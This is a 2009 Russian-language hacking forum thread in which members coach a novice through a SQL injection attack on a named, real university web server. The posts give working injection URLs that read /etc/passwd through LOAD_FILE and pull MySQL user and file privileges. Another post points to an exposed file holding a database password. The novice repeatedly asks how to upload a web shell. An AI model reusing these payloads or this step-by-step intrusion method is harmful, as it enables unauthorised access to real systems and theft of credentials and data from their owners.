ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.07.2009, 00:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX
Если У - то можно полюбас.Если N - обломался,чуваг.
|
|
|
07.07.2009, 00:55
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Велемир
Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX
Если У - то можно полюбас.Если N - обломался,чуваг.
Помоги составить этот запрос на данном примере плиз. Я просто новичок.
Код HTML:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5+limit+1,1/*
|
|
|
|
07.07.2009, 01:06
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(concat_ws(0x3a,user,f ile_priv))),2,3,4,5+from+mysql.user+where+user=0x7 26F6F74/*
Повезло
|
|
|
|
07.07.2009, 11:20
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402
Репутация:
22
|
|
Даже вот так можно
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(group_concat(0x0a,use r,0x3a,file_priv))),2,3,4,5+from+mysql.user/*
|
|
|
|
07.07.2009, 12:04
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Спс. люди. А теперь мне помогите залить туда файл /tmp/phpinfo.php
с текстом <? phpinfo(); ?>
Я читал статьи на ачате, но там при заливке юзались ковычки и слэши а тут они вырублены. плиз подскажите
add
snake: ты её уже залил? помоги плиз соствит запрос.
Последний раз редактировалось nub-hacker; 07.07.2009 в 12:19..
|
|
|
|
07.07.2009, 12:05
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://yarra.ics.uci.edu/phpinfo.php
в помощь тебе, теперь залить станет легче...если конечно под запись найдешь диру))
|
|
|
|
07.07.2009, 13:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
А может и это поможет:
Код:
http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties
|
|
|
|
07.07.2009, 14:40
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Pashkela
А может и это поможет:
Код:
http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties
спс за намёки. там пасс к БД. Но я очень прошу Вас помогите составить SQL запрос на заливку файла. Очень прошу плиз.
|
|
|
|
07.07.2009, 14:49
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Через скулю ты там шелл не зальешь, т.к. magic quotes=on и двойной запрос не работает. Забудь
|
|
|
|
07.07.2009, 14:58
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от Pashkela
Через скулю ты там шелл не зальешь, т.к. magic quotes=on и двойной запрос не работает. Забудь
Понятно, просто чел под ником Велемир несколькими постами выше голову задурил что можно залить.
А вы видите ещё способ залития туда шелла?
Я думую что если там будет удалённое подключение Бд. то можно наверное тот пасс применить .
Есть ещё способы?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
